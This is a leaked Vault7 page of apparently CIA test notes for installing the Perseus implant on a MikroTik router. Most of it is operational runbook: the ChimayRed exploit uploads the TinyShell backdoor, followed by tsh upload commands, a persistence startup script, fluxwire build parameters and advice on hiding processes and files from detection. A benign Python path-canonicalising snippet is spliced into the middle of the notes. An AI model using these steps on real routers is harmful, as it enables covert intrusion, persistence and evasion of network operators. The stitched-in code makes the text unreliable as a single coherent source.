Vault7: CIA Hacking Tools Revealed

Owner: User #14587667
Perseus 1.1.0b1 Mikrotik RB493G - Test Notes
Perseus 1.1.0 Beta 1
MikroTik RB493G
General Info
WAN (from TR-Core)
TR-CoreSwx: Perseus:
TR-Core Switch Route: -> (This gives the Perseus LAN 30 host IPs)
LAN Hosts: Perseus Test1 -1.1.0b1 - UbuntuDesktop 14.10 x64 Windows 7 VM
Cisco 2960:
- Changed RB493G ether1 IP to
- Changed RB493G ether2 IP to
- Default IP:
- Figure out how to run ChimayRed and TinyShell (TshPatcher).
- Unable to connect RB493G to Console server. Checked MT website and confirmed settings, but no luck.
- Downloaded and upgraded MT f/w to v6.27
- Move Windows VM to VLAN-602 (Perseus Internal).
- Use Winbox to upload new f/w. Copy "routeros-mipsbe-6.27.npk" using the Files List window.
- Select System -> Reboot. Once rebooted, the new version number (6.27) will be seen in the Winbox Title.
Setup TR-Core route to
ip route name Perseus-MT_RB493G
- Add default route ( via for MT (IP -> Routes):
- Setup ACL (on TR-Core) to restrict VLAN access (see Access List Configuration section below for settings).
- Configure NAT on RB493G using the following rule (IP -> Firewall -> NAT):
- Delete 'Serial0' port under System -> Console.
- Setup NTP client (System -> SNTP Client):
- Apply ACLs to VLAN601 (Perseus WAN)
- Worked with Bingham to throw ChimayRed and TinyShell on MT RB-493G.
- Here is the order exploits/tools are used operationally:
- Package TinyShell with port, key, architecture, and shell (optional)
- Use ChimayRed to upload exploit (TinyShell) to MT. Requires access to ports 8291 and 80.
- Connect to TinyShell. You are now in an encrypted session between ICON and the MT.
- Upload BusyBox and/or Perseus.
- For more specific details refer to the step-by-step guide "Chimay Red, TinyShell, and BusyBox Quick Start Guide".
ID | Status | Task |
3 | complete | User #14587667 Need to get BusyBox binary from Bingham (Make sure I can log into OSN first). |
4 | complete | User #14587667 Use ChimayRed to upload BusyBox on MT. Use COG version of BB. |
5 | complete | User #14587667 Review ICON script/notes to flesh out instructions above |
- Reset MT and exploited again using ChimayRed and TinyShell.
- Copied BusyBox binary from OSN to Devlan. Confirmed with Bingham that this is the current version that COG/NOD is using (mips-be version)
- Uploaded BusyBox (COG version) to MT using TinyShell.
ID | Status | Task |
6 | incomplete | User #14587667 Finding: I had a TS connection open and it was sitting idle for a while (maybe about 45 min). When I came back to the remote shell, it was hung. Ctrl-C, Ctrl-Z did not work. Nothing appears when I type. |
7 | complete | User #14587667 Bug??: After running ./start, I touched a file named /flash/boot/hi.txt and it was not hidden. After re-deploying P it was hidden. |
13 | incomplete | User #14587667 Caution: Do not make removal trigger a read-only partition. If so, how do you trigger removal? |
14 | incomplete | User #14587667 Bug??: Did the timestamp of /flash/boot change when Perseus was installed? |
15 | complete | User #14587667 |
- Talked with User #73708 on the phone. Secure delete is kicking in and deleting the files Perseus should be hiding. User #73708 needs to research this some more and will get back in touch with me tomorrow.
- User #73709 requested configuration and log files of the Perseus installation and execution. 2015-04-16_063833-Perseus-Install_Log.log
- User #73708 and User #73709 came over to DD2 and User #73708 worked with me to troubleshoot the MT. It turns out that the kernel had been deleted by secure delete. User #73708 and User #73709 took the MT back with them to TP to perform further analysis.
- Re-configured MT with WAN, LAN, NAT settings. Device had been bricked and was reset by TP.
ID | Status | Task |
21 | incomplete | User #14587667 Is this a CR bug?? If so, does it need to be reported? Error when throwing CR |
22 | complete | User #14587667 Shouldn't this be hidden? Resolution: I spoke with User #73708 and Perseus hides the absolute path. In this case /tmp is a symlink to /rw/tmp and /rw/tmp is a symlink to /flash/rw/tmp. So /tmp is a symlink to /flash/rw/tmp. The full path needed to hide /tmp/tshd-mipsbe is actually /flash/rw/tmp/tshd-mipsbe. |
- Spoke with User #73708 to troubleshoot why /tmp/tshd-mipsbe is not hidden when running "ps ax" (Notes under 4/27/2015).
- Refer to "2015-04-28_110134-Perseus-ICON_window1 TS process not hidden w new command" for logs.
ID | Status | Task |
26 | complete | User #14587667 Determine how to make TS startup after reboot. User #73708 suggested placing a startup script in /flash/etc/rc.d/run.d/S99tsh which will launch TS. Also need to upload TS to /flash/boot/hidden (/tmp is not persistent). |
- Created startup script to make tsh persistent (/flash/etc/rc.d/run.d/S99tsh).
- Although tsh is not hidden when run from /tmp/tshd-mipsbe, it is hidden when it is run from /flash/boot/hidden/tshd-mipsbe (after reboot).
- Current parameters used to generate perseus:
python -f /flash/boot/hidden -f /flash/etc/rc.d/run.d/S99mcc -f /flash/etc/rc.d/run.d/S99tsh -d /flash/boot/hidden -p /flash/rw/tmp/tshd-mipsbe -S /flash/boot/hidden/start -s 1 -m /flash/boot/hidden/mcc.ko -r /flash/boot/hidden/dont_panic deploy
ID | Status | Task |
27 | complete | User #14587667 When a process is started and then the originating binary is deleted (the process is still running), Perseus does not hide it. |
- Put together step by step instructions for TP to replicate bug PS-1.
ID | Status | Task |
28 | complete | User #14587667 Check these counters when using Perseus to see if it affects the counters |
ID | Status | Task |
29 | incomplete | Tsh traffic does show up in Torch when executing commands from ICON |
- Installed Cacti server (
- Racked Cisco 2960 to extend MT network. Added subnet
- Added VLANs 605, 606, 607 so hosts can be added to Cisco 2960/MT LAN2 for testing.
- Configured RB493G to send syslog and SNMP to Cacti server.
- Fixed Cacti rsyslog config (/etc/rsyslog.conf) and added instructions to Linux confluence page.
Setup port-forward from WAN IP to Cacti server.
Create trunk between RB493G and Cisco 2960 and connect two host VMs
- MT Settings: (switchports)
(ip address)
Cisco Settings:
- MT Settings: (switchports)
- Configured Cisco 2960
- NTP client (ntp server
- Default gateway (int vlan 10; ip default-gateway
- Setup syslog (service timestamps log datetime localtime; logging; logging trap informational)
- Configure flux
- flx-packer -s linux:mipsbe:mikrotik:6.x -o mt-fw_node -k aaaabbbbccccdddd --link "ip4= tcp=443 watchdog=0:0" -m 1250
- User #73710 confirmed with CANDILIS that fluxwire 3.3 was successfully run on a MikroTik running ROS 6.27. He did not confirm it was BE or LE.
- I am having trouble running fluxwire 3.3 on the RB493G running ROS 6.27. I was able to successfully create an Ubuntu flux node (using the same commands with the only difference being the target architecture).
- I was unable to run fluxwire when perseus was installed. The process never appeared in the process list. I tried running it from both hidden and non-hidden directories. As soon as I removed perseus, fluxwire ran just fine.
- This was not a Perseus bug. See notes from 5/19 for solution.
- The fluxwire node will not start if you try to run it from outside the directory it resides in. In other words, you must first cd to the binary's directory.
ID | Status | Task |
31 | incomplete | Ask User #73708 why they recommend /flash/boot. Is it because secure-delete is quicker? |
- Configured console server for RB493G and RB450G (Rack 6).
- Username: admin
- Password: <none>
- Setup P2P link between RB493G and RB450G.
On 493G: ip address add address= netmask= interface=ether4 comment=To_RB450G_ether4
On 450G: ip address add address= netmask= interface=ether4 comment=To_RB493G_ether4
Setup RIP routing between RB493G and RB450G
On 493G:
/routing rip interface add interface=ether4 comment="RIP to RB450"
/routing rip interface add interface=ether6
/routing rip set redistribute-connected=yes
/routing rip network add network=
On 450G:
/routing rip interface add interface=ether4 comment="RIP to RB493"
/routing rip set redistribute-connected=yes
/routing rip network add network=
Verify routes: /routing rip route print
- Perseus only deletes files/directories that are specified to be hidden.
- If secure delete is not used, but mcc is reverted manually (using /tmp/busybox rmmod mcc) ...
- To hide an executable, the absolute path to the binary must be specified using the -p option. The MT uses many symlinks (i.e. /tmp is a symlink for /flash/rw/tmp), so be sure to determine the absolute path. You can use the "readlink -f <path>" command to show the absolute path.
- If ts is running from a hidden directory and perseus is removed (by touching the trigger file), then the tshd process is no longer hidden and appears in the process list. So if tsh was run from /flash/boot/hidden/tshd-mipsbe, the directory /flash/boot/hidden is deleted, but /flash/boot/hidden/tshd-mipsbe shows up in the process list (ps ax).
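The symlink chain in the notes above (/tmp -> /rw/tmp -> /flash/rw/tmp) means a path seen in a file or process listing cannot be compared against a baseline until it has been resolved the way "readlink -f" does. The following Python is an added example, not part of these notes or of any tool they mention: a component-by-component resolver over a constructed symlink table (the loop_a/loop_b cycle is also constructed, to show the loop guard), used to collapse aliased paths when reviewing a listing from the router.

```python
"""Canonicalize paths through a symlink table, in the manner of `readlink -f`.

Added example, not from the original notes. The symlink table is constructed
from the chain the notes describe: /tmp -> /rw/tmp -> /flash/rw/tmp. A reviewer
comparing a process list or file listing against a known-good baseline needs
every path in canonical form, otherwise /tmp/tshd-mipsbe and
/flash/rw/tmp/tshd-mipsbe are counted as two different files.
"""
import posixpath

# Constructed symlink table: link path -> target (absolute or relative).
ROUTEROS_SYMLINKS = {
    "/tmp": "/rw/tmp",
    "/rw/tmp": "/flash/rw/tmp",
    "/loop_a": "/loop_b",   # constructed cycle, exercises the loop guard
    "/loop_b": "/loop_a",
}

MAX_HOPS = 40  # same order of magnitude as the kernel's ELOOP limit


def canonicalize(path, links=ROUTEROS_SYMLINKS):
    """Resolve every symlinked component of `path`; raise on a link loop."""
    resolved = "/"
    hops = 0
    parts = [p for p in posixpath.normpath(path).split("/") if p]
    while parts:
        part = parts.pop(0)
        candidate = posixpath.join(resolved, part)
        target = links.get(candidate)
        if target is None:          # ordinary directory or file component
            resolved = candidate
            continue
        hops += 1
        if hops > MAX_HOPS:
            raise ValueError("symlink loop while resolving %s" % path)
        if not target.startswith("/"):   # relative link: relative to its dir
            target = posixpath.join(resolved, target)
        # Re-walk the target's components so chained links are followed too.
        parts = [p for p in posixpath.normpath(target).split("/") if p] + parts
        resolved = "/"
    return resolved


def collapse_paths(paths, links=ROUTEROS_SYMLINKS):
    """Group a listing by canonical path: canonical -> sorted list of aliases."""
    seen = {}
    for p in paths:
        seen.setdefault(canonicalize(p, links), set()).add(p)
    return {k: sorted(v) for k, v in seen.items()}
```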
Install Perseus
ID | Status | Task |
20 | incomplete | User #14587667 Update these steps. for current instructions, refer to \\\share\Testing\Perseus 1.1.0b1\2015-04-15 Perseus Commands.txt |
- Copy to ICON VM.
- Build the installation package
$ python -f /flash/boot -f /tmp/busybox2 -d /flash/boot -d /flash/data -S /flash/boot/start -s 1 -m /flash/boot/mcc.ko -r /tmp/dont_panic deploy
- Create /tmp/hidden directory on MT.
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase
# mkdir /tmp/hidden
# exit
- Upload Perseus to MT. The prerequisites for this include CR, TS, and BB (optional).
From ICON, execute the commands:
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/mcc.ko /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/S99mcc /flash/boot
$ ~/Desktop/TshPatcher_v1.0.4/tsh-x86_64 12345 MyPassphrase put ~/Desktop/deploy_perseus_1.1.0.0b1_routeros6_mips/start /flash/boot
- Make "start" executable
# chmod +x /tmp/perseus/start
- Start Perseus implant
# /flash/boot/start
Useful MT commands:
Command | Description |
/ip route print | Print list of IP addresses configured for router |
/system console print | Display list of console ports |
/port print | Check if application is using port |
/port print detail | Display port settings (baud, data rate, etc) |
/system serial-terminal serial0 | Connect to serial port |
Access List Configuration
Create ACL
ip access-list ext Perseus-WAN
permit ip host host
deny ip any any log
show access-list
Apply ACL to VLAN
int vlan 601
ip access-group Perseus-WAN in
show access-list Perseus-WAN
Add statement to ACL and resequence
ip access-list ext Perseus-WAN
15 permit ip host host
ip access-list resequence Perseus-WAN 10 10
Show Access List hits
show log | inc list Perseus-WAN
Areas to test
ID | Status | Task |
8 | incomplete | |
def parse_args(self, args):
# XXX TODO Bounds checks
# XXX Add checking for os version file, mcc, hide_files
ID | Status | Task |
9 | incomplete | Network latency |
Decrease network latency <40%
ID | Status | Task |
10 | incomplete | File remnants after Perseus removal |
11 | complete | Running processes ("ps ax") |
12 | incomplete | bouncing VM / restarting networking service |
17 | incomplete | change MTU |
18 | incomplete | change latency |
30 | incomplete | Use MT Torch tool while implanting and see if anything is detected. |
19 | complete | Check available disk space (does it change after implanted?) |